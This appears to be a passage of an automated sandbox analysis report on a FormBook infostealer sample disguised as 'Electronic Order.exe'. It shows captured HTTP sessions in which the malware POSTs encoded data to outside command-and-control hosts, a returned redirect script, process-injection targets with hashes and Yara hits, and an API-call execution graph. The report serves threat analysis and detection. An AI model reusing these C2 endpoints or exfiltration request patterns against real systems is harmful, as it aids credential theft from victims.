                                    Data Ascii: bB=ojwlwz5hjBb/9L9h8G44nmyQ4aXmOHs+ZmJUNkpBjbsUOoki0hhh66zEze7VLDy+qW2cmXLlJVmmrah705N4ktV9qFGZFO0YxFD42s4n0+TZ+kCVsGPIQLNk302xiLOqQlGHazdNOyRwqBVe+FxhhMYWUGy7C6WnmEzHgQT+zFyeWAWy3vKpyGv3A4PBYnGtjfKfd5cDRXeDxNukntIffNQJkEWu1FKNpm2xZ+Pn/9os2/O/raNtLG7gah2dR2ebVx0+0xX9Sc/K+Wt8HbUQkYS++YSh1TOHtkGixK7eIs1O7NKqyCQ5QBkvqOocpcRLPJ97ym7z6XTrhpLA2vFPd5vXj5AD+4nYD4Co+VYpK+YC1UdkvzgzdV5P+lDYrAVajaKFZLKv8NiD/8HMp8Pu2N90n5K4aMfKqMKEudpc6j9bc3wfw6FTqr/rYOb/lq+PpY456amt9+pCuQvl3MkR7XYcfWjek3wre+ONmw2/sTqh3KVfZhixgf4y/zW0ER9fEpWcf/vXpjID9/awnlV982izJbJlre0Twdtwa5bO2repzj+CghvRQ2SG24AuUSJkyVfB/4sPLguD2EaTFWsUTaUdW0N9ZzhfacfhN9GgY3dSN49lNwbH1vPak+N/EGguj92cFVXhQSPdrjIXYhH8mEcZm75xuAzhLArjPSMXBkmsKoy9rmcNgkULDim1gXhvrOAPj0enlHUp5TH5KC6SNW5IGxKsjRufXB1+zibPJXiQqFF1ejFEM/hEaPiQVUDVXxBei3Q/nYfOEin1qGmeBQT++TF3Q8ROui+Tic/4wsQqzOjH9N2c1bggJE3z3vmeZmTIA7lYLAeFdWZctDqln+kyWuIxG2guDxqx3+a6dD3NKd0Kb4IxER7Z0OSQ5JSHC0xnV5md1F7C4MyTE/OJurNa4Zv/i+KjyK9v1T/59bjKT4xaFcA5bc9WCpWeMakUNIE2StXoLIOYgtiMl1st85hJ/lfe/pQ/3fE3WmVYugRSw8fzL [TRUNCATED]
                                    Jul 11, 2024 15:07:37.095194101 CEST | 557 | IN | HTTP/1.0 200 OK
                                    Connection: close
                                    Cache-Control: max-age=259200
                                    Content-Type: text/html;charset=utf-8
                                    Content-Length: 428
                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                    Session ID: 28 | Source IP: 192.168.2.6 | Source Port: 49752 | Destination IP: 154.222.238.52 | Destination Port: 80 | PID: 6784 | Process: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:07:38.871550083 CEST | 575 | OUT | GET /y0md/?bB=lhYFzH0o7AOzoOxHjW4ZhXPez5XkAFEXcnJkHRBG9JNzObhY0gQYyKrA4KXJDxiKggydmH3cVTSej7Njru8XnetdiFa9P8wohXrN8dkg8umKuQr54UaIPdByszOLqpj+dFvVfmQ=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.j51a.xyz
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:07:39.656439066 CEST | 557 | IN | HTTP/1.0 200 OK
                                    Connection: close
                                    Cache-Control: max-age=259200
                                    Content-Type: text/html;charset=utf-8
                                    Content-Length: 428
                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://http.gn301.com:12345/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                    Session ID: 29 | Source IP: 192.168.2.6 | Source Port: 49753 | Destination IP: 162.254.38.56 | Destination Port: 80 | PID: 6784 | Process: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:07:45.121443987 CEST | 835 | OUT | POST /soqq/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dospole.top
                                    Content-Length: 207
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dospole.top
                                    Referer: http://www.dospole.top/soqq/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Ascii: bB=Qpmvr164SYBC5BIjUiF+CNy5s5TlJs4m0eD/Ep/qZQTXENd+5gpNS8M1f4/E7kA6SjM6CN4QJOmmGzPu7i/Wy6xLT0+xK24qYBVPNhEapvQHADHDjA4t1suQnJCSSHTsUu9OBL0TgtgDfE8AzhyuQXl4EHqYXWvysfEE704heJulcK9wHP3pwduACjFVOKA3QomDldlYI3wM
                                    Jul 11, 2024 15:07:45.734488964 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:45 GMT
                                    Server: Apache
                                    Content-Length: 16052
                                    Connection: close
                                    Content-Type: text/html
                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                    Session ID: 30 | Source IP: 192.168.2.6 | Source Port: 49754 | Destination IP: 162.254.38.56 | Destination Port: 80 | PID: 6784 | Process: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jul 11, 2024 15:07:47.687247992 CEST | 859 | OUT | POST /soqq/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dospole.top
                                    Content-Length: 231
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dospole.top
                                    Referer: http://www.dospole.top/soqq/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Ascii: bB=Qpmvr164SYBC4igjWFZ+KNy6wJTlDM4Y0ef/EtunZi3XDst+rxpNR8M1XY/71EA9SiwyCJ4QJOCmGy/u6T/VwqxJfU+3Xm4qYBVPNhQkpvIHAy3DxR4uzcuRxZCSWHSlUu9sBK54gvIDfGkAz1mveXl6a3rQbWL/iNdIyzUVGeu0Qc8qb83KiNOCChdnOqAdSoeD3Kp/HDVvnN427KwLC5m0GVez1kMhQA==
                                    Timestamp: Jul 11, 2024 15:07:48.272490025 CEST, Bytes transferred: 1236, Direction: IN
                                    HTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:48 GMT
                                    Server: Apache
                                    Content-Length: 16052
                                    Connection: close
                                    Content-Type: text/html
                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                    Session ID: 31, Source IP: 192.168.2.6, Source Port: 49755, Destination IP: 162.254.38.56, Destination Port: 80, PID: 6784
                                    Process: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp: Jul 11, 2024 15:07:50.276890039 CEST, Bytes transferred: 1872, Direction: OUT
                                    POST /soqq/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dospole.top
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dospole.top
                                    Referer: http://www.dospole.top/soqq/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Ascii: bB=Qpmvr164SYBC4igjWFZ+KNy6wJTlDM4Y0ef/EtunZi/XDel+5GVNQ8M1d4/+1EB4Sio+CJ8qJMKmAUju9hXV6qxJX0+2K25gYC9LNhAkpvIHAxvDhw4uocuQnJCoSHTMUulGBKtOgfoDclcA1AyvBnl8b3qWbW2/iNR+y2pCGZu0T5hRAMrL99mzTDgDHdtoXoXz8JZtZzR7iYQt7JBXLIioYzqjxWNDCXXGldJ1RJDAgZ98HS18NjkpVBECY/00Tu2NUfWC4Cw4Q1j80vFXNJ966PvG7Pk57RrvVa3yWxGe7IozYKfPkcegGa8BTWgUv2A7jcN/moJuCLu41uwqnJ6B1GJNJDJNB2WzwSl1Puc/y0EHtovwcQACsZK3FO9clovroLB229lH3drviWaBf4C/Mx3WuboCzM0UXHDfGAhPoy+W4B8Pi2TA2Mj49oH7PEkDKi1NbuOAfqgWZMbFM7AcGJLPewUosYvoNwVUIFqGyMH8K2wQCRU9L4QGHaagOFqBCWOSWc+5+X9LDbgQME7Y/o19RWnnpXb1ERpKDNqnRR/g72kmQk7RadkOawDwOvzuNpKRVJtyHcrix1woi9EozHRl51CASSOMiqwO5HP2ypKbWnu4uPhSfuHbajvkZD87xPjJ9/QpJPB1ItbaJyle94OZrWgh4114Jcp20q4qR7cWiD0n3WBBab9TRTavY1XuBHyfhcix4bLluFNmdMQbg4T7h3kGGxRFYDdlZQOr798dfvUDHji0O8wx3kslKFi5WwrftcmHFC6tM5Ie14aXOtyeWGPwkzkPLbmhbFii7uKMv4duwONGbS18ZOD0NMHKfwW2enbehhTvlRkirtdDUPYskBO9y/as4ZDXIbY/X9YZUz46PMyPPjNCIWIhQYFvBSIOYVOWo+QAN2HvIofKvV1yv0CySvbVSQIZccbaPhRlxddM2rQUPmpB/1ha5CUBOhjXgHwf+4lJdTXuw9Vdmrzl76OaPlXDm6guotfvAbRXI [TRUNCATED]
                                    Timestamp: Jul 11, 2024 15:07:50.859935045 CEST, Bytes transferred: 1236, Direction: IN
                                    HTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:50 GMT
                                    Server: Apache
                                    Content-Length: 16052
                                    Connection: close
                                    Content-Type: text/html


                                    Session ID: 32, Source IP: 192.168.2.6, Source Port: 49756, Destination IP: 162.254.38.56, Destination Port: 80, PID: 6784
                                    Process: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Timestamp: Jul 11, 2024 15:07:52.855523109 CEST, Bytes transferred: 578, Direction: OUT
                                    GET /soqq/?bB=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7k16wibVueXlEfGw9FaQEmodkJNWHPkyZ3qvHXqJK/emHwRvwAPtc=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.dospole.top
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Timestamp: Jul 11, 2024 15:07:53.434295893 CEST, Bytes transferred: 1236, Direction: IN
                                    HTTP/1.1 404 Not Found
                                    Date: Thu, 11 Jul 2024 13:07:53 GMT
                                    Server: Apache
                                    Content-Length: 16052
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8



                                    Target ID:0
                                    Start time:09:04:47
                                    Start date:11/07/2024
                                    Path:C:\Users\user\Desktop\Electronic Order.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Electronic Order.exe"
                                    Imagebase:0xdc0000
                                    File size:1'205'760 bytes
                                    MD5 hash:F44D956AA3A0C41F8E8CA7D9E9EAD69C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:2
                                    Start time:09:04:47
                                    Start date:11/07/2024
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Electronic Order.exe"
                                    Imagebase:0x810000
                                    File size:46'504 bytes
                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:5
                                    Start time:09:05:06
                                    Start date:11/07/2024
                                    Path:C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe"
                                    Imagebase:0x870000
                                    File size:140'800 bytes
                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                    Reputation:high
                                    Has exited:false

                                    Target ID:7
                                    Start time:09:05:08
                                    Start date:11/07/2024
                                    Path:C:\Windows\SysWOW64\sfc.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\sfc.exe"
                                    Imagebase:0x980000
                                    File size:40'448 bytes
                                    MD5 hash:4D2662964EF299131D049EC1278BE08B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Reputation:low
                                    Has exited:false

                                    Target ID:9
                                    Start time:09:05:31
                                    Start date:11/07/2024
                                    Path:C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe"
                                    Imagebase:0x870000
                                    File size:140'800 bytes
                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:11
                                    Start time:09:05:46
                                    Start date:11/07/2024
                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                    Imagebase:0x7ff728280000
                                    File size:676'768 bytes
                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:4%
                                      Dynamic/Decrypted Code Coverage:1.5%
                                      Signature Coverage:4.6%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:45
99065->99068 99073 e02ad9 99065->99073 99069 e02aca 99068->99069 99068->99094 99108 e3ad0f 331 API calls 99069->99108 99070 de2f80 __cinit 67 API calls 99070->99094 99073->99091 99109 e3b1b7 331 API calls 3 library calls 99073->99109 99074 dcd594 99102 dc8bb2 68 API calls 99074->99102 99075 e02cdf 99075->99075 99076 dcd6ab 99076->99061 99080 dcd5a3 99080->99061 99081 e02c26 99114 e3aa66 89 API calls 99081->99114 99091->99076 99115 e2a0b5 89 API calls 4 library calls 99091->99115 99092 dca000 331 API calls 99092->99094 99093 dc81a7 59 API calls 99093->99094 99094->99070 99094->99074 99094->99076 99094->99081 99094->99091 99094->99092 99094->99093 99096 dc88a0 68 API calls __cinit 99094->99096 99097 dc86a2 68 API calls 99094->99097 99098 dc8620 99094->99098 99103 dc859a 68 API calls 99094->99103 99104 dcd0dc 331 API calls 99094->99104 99105 dc9f3a 59 API calls Mailbox 99094->99105 99106 dcd060 89 API calls 99094->99106 99107 dccedd 331 API calls 99094->99107 99111 dc8bb2 68 API calls 99094->99111 99112 dc9e9c 60 API calls Mailbox 99094->99112 99113 e16d03 60 API calls 99094->99113 99096->99094 99097->99094 99099 dc862b 99098->99099 99101 dc8652 99099->99101 99116 dc8b13 69 API calls Mailbox 99099->99116 99101->99094 99102->99080 99103->99094 99104->99094 99105->99094 99106->99094 99107->99094 99108->99076 99109->99091 99110->99094 99111->99094 99112->99094 99113->99094 99114->99091 99115->99075 99116->99101 99117 15823b0 99118 1580000 GetPEB 99117->99118 99119 1582491 99118->99119 99131 15822a0 99119->99131 99132 15822a9 Sleep 99131->99132 99133 15822b7 99132->99133 99134 dc1055 99139 dc2649 99134->99139 99137 de2f80 __cinit 67 API calls 99138 dc1064 99137->99138 99140 dc77c7 59 API calls 99139->99140 99141 dc26b7 99140->99141 99146 dc3582 99141->99146 99143 dc2754 99144 dc105a 99143->99144 99149 dc3416 59 API calls 2 library calls 99143->99149 99144->99137 99150 dc35b0 99146->99150 99149->99143 99151 dc35bd 99150->99151 99152 dc35a1 99150->99152 99151->99152 99153 
dc35c4 RegOpenKeyExW 99151->99153 99152->99143 99153->99152 99154 dc35de RegQueryValueExW 99153->99154 99155 dc35ff 99154->99155 99156 dc3614 RegCloseKey 99154->99156 99155->99156 99156->99152 99157 dfff06 99158 dfff10 99157->99158 99194 dcac90 Mailbox _memmove 99157->99194 99299 dc8e34 59 API calls Mailbox 99158->99299 99164 dcb5d5 99167 dc81a7 59 API calls 99164->99167 99165 de0ff6 59 API calls Mailbox 99183 dca097 Mailbox 99165->99183 99177 dca1b7 99167->99177 99168 e0047f 99303 e2a0b5 89 API calls 4 library calls 99168->99303 99169 dcb5da 99309 e2a0b5 89 API calls 4 library calls 99169->99309 99171 dc81a7 59 API calls 99171->99183 99173 dc77c7 59 API calls 99173->99183 99174 dc7f41 59 API calls 99174->99194 99176 e0048e 99178 de2f80 67 API calls __cinit 99178->99183 99180 e17405 59 API calls 99180->99183 99181 e166f4 Mailbox 59 API calls 99181->99177 99182 e00e00 99308 e2a0b5 89 API calls 4 library calls 99182->99308 99183->99164 99183->99165 99183->99168 99183->99169 99183->99171 99183->99173 99183->99177 99183->99178 99183->99180 99183->99182 99186 dca6ba 99183->99186 99293 dcca20 331 API calls 2 library calls 99183->99293 99294 dcba60 60 API calls Mailbox 99183->99294 99307 e2a0b5 89 API calls 4 library calls 99186->99307 99187 e166f4 Mailbox 59 API calls 99187->99194 99188 dcb416 99298 dcf803 331 API calls 99188->99298 99190 dca000 331 API calls 99190->99194 99191 e00c94 99305 dc9df0 59 API calls Mailbox 99191->99305 99193 e00ca2 99306 e2a0b5 89 API calls 4 library calls 99193->99306 99194->99174 99194->99177 99194->99183 99194->99187 99194->99188 99194->99190 99194->99191 99194->99193 99197 dcb37c 99194->99197 99199 de0ff6 59 API calls Mailbox 99194->99199 99203 dcb685 99194->99203 99206 dcade2 Mailbox 99194->99206 99215 e3c5f4 99194->99215 99247 e27be0 99194->99247 99253 e3bf80 99194->99253 99300 e17405 59 API calls 99194->99300 99301 e3c4a7 85 API calls 2 library calls 99194->99301 99196 e00c86 99196->99177 99196->99181 99296 dc9e9c 60 API calls Mailbox 
99197->99296 99199->99194 99200 dcb38d 99297 dc9e9c 60 API calls Mailbox 99200->99297 99304 e2a0b5 89 API calls 4 library calls 99203->99304 99206->99177 99206->99196 99206->99203 99207 e000e0 VariantClear 99206->99207 99208 e2d2e6 101 API calls 99206->99208 99209 e3e237 130 API calls 99206->99209 99210 e3e24b 130 API calls 99206->99210 99211 dc5906 60 API calls 99206->99211 99212 e423c9 87 API calls 99206->99212 99213 dd2123 95 API calls 99206->99213 99214 e3474d 331 API calls 99206->99214 99295 dc9df0 59 API calls Mailbox 99206->99295 99302 e17405 59 API calls 99206->99302 99207->99206 99208->99206 99209->99206 99210->99206 99211->99206 99212->99206 99213->99206 99214->99206 99216 dc77c7 59 API calls 99215->99216 99217 e3c608 99216->99217 99218 dc77c7 59 API calls 99217->99218 99219 e3c610 99218->99219 99220 dc77c7 59 API calls 99219->99220 99221 e3c618 99220->99221 99222 dc9997 84 API calls 99221->99222 99246 e3c626 99222->99246 99223 dc7d2c 59 API calls 99223->99246 99224 e3c80f 99225 e3c83c Mailbox 99224->99225 99312 dc9b9c 59 API calls Mailbox 99224->99312 99225->99194 99227 e3c7f6 99229 dc7e0b 59 API calls 99227->99229 99228 dc81a7 59 API calls 99228->99246 99231 e3c803 99229->99231 99230 e3c811 99233 dc7e0b 59 API calls 99230->99233 99235 dc7c8e 59 API calls 99231->99235 99232 dc7a84 59 API calls 99232->99246 99236 e3c820 99233->99236 99234 dc7faf 59 API calls 99238 e3c6bd CharUpperBuffW 99234->99238 99235->99224 99239 dc7c8e 59 API calls 99236->99239 99237 dc7faf 59 API calls 99240 e3c77d CharUpperBuffW 99237->99240 99310 dc859a 68 API calls 99238->99310 99239->99224 99311 dcc707 69 API calls 2 library calls 99240->99311 99243 dc9997 84 API calls 99243->99246 99244 dc7e0b 59 API calls 99244->99246 99245 dc7c8e 59 API calls 99245->99246 99246->99223 99246->99224 99246->99225 99246->99227 99246->99228 99246->99230 99246->99232 99246->99234 99246->99237 99246->99243 99246->99244 99246->99245 99248 e27bec 99247->99248 99249 de0ff6 Mailbox 59 API calls 
99248->99249 99250 e27bfa 99249->99250 99251 e27c08 99250->99251 99252 dc77c7 59 API calls 99250->99252 99251->99194 99252->99251 99254 e3bfc5 99253->99254 99255 e3bfab 99253->99255 99314 e3a528 59 API calls Mailbox 99254->99314 99313 e2a0b5 89 API calls 4 library calls 99255->99313 99258 e3bfd0 99259 dca000 330 API calls 99258->99259 99260 e3c031 99259->99260 99261 e3c0c3 99260->99261 99265 e3c072 99260->99265 99286 e3bfbd Mailbox 99260->99286 99262 e3c119 99261->99262 99263 e3c0c9 99261->99263 99264 dc9997 84 API calls 99262->99264 99262->99286 99335 e27ba4 59 API calls 99263->99335 99266 e3c12b 99264->99266 99315 e27581 59 API calls Mailbox 99265->99315 99268 dc7faf 59 API calls 99266->99268 99272 e3c14f CharUpperBuffW 99268->99272 99269 e3c0ec 99336 dc5ea1 59 API calls Mailbox 99269->99336 99271 e3c0a2 99316 dcf5c0 99271->99316 99276 e3c169 99272->99276 99275 e3c0f4 Mailbox 99337 dcfe40 331 API calls 2 library calls 99275->99337 99277 e3c170 99276->99277 99278 e3c1bc 99276->99278 99338 e27581 59 API calls Mailbox 99277->99338 99279 dc9997 84 API calls 99278->99279 99281 e3c1c4 99279->99281 99339 dc9fbd 60 API calls 99281->99339 99284 e3c19e 99285 dcf5c0 330 API calls 99284->99285 99285->99286 99286->99194 99287 e3c1ce 99287->99286 99288 dc9997 84 API calls 99287->99288 99289 e3c1e9 99288->99289 99340 dc5ea1 59 API calls Mailbox 99289->99340 99291 e3c1f9 99341 dcfe40 331 API calls 2 library calls 99291->99341 99293->99183 99294->99183 99295->99206 99296->99200 99297->99188 99298->99203 99299->99194 99300->99194 99301->99194 99302->99206 99303->99176 99304->99196 99305->99196 99306->99196 99307->99177 99308->99169 99309->99177 99310->99246 99311->99246 99312->99225 99313->99286 99314->99258 99315->99271 99317 dcf61a 99316->99317 99318 dcf7b0 99316->99318 99320 e04848 99317->99320 99321 dcf626 99317->99321 99319 dc7f41 59 API calls 99318->99319 99327 dcf6ec Mailbox 99319->99327 99322 e3bf80 331 API calls 99320->99322 99428 dcf3f0 331 API calls 2 library calls 
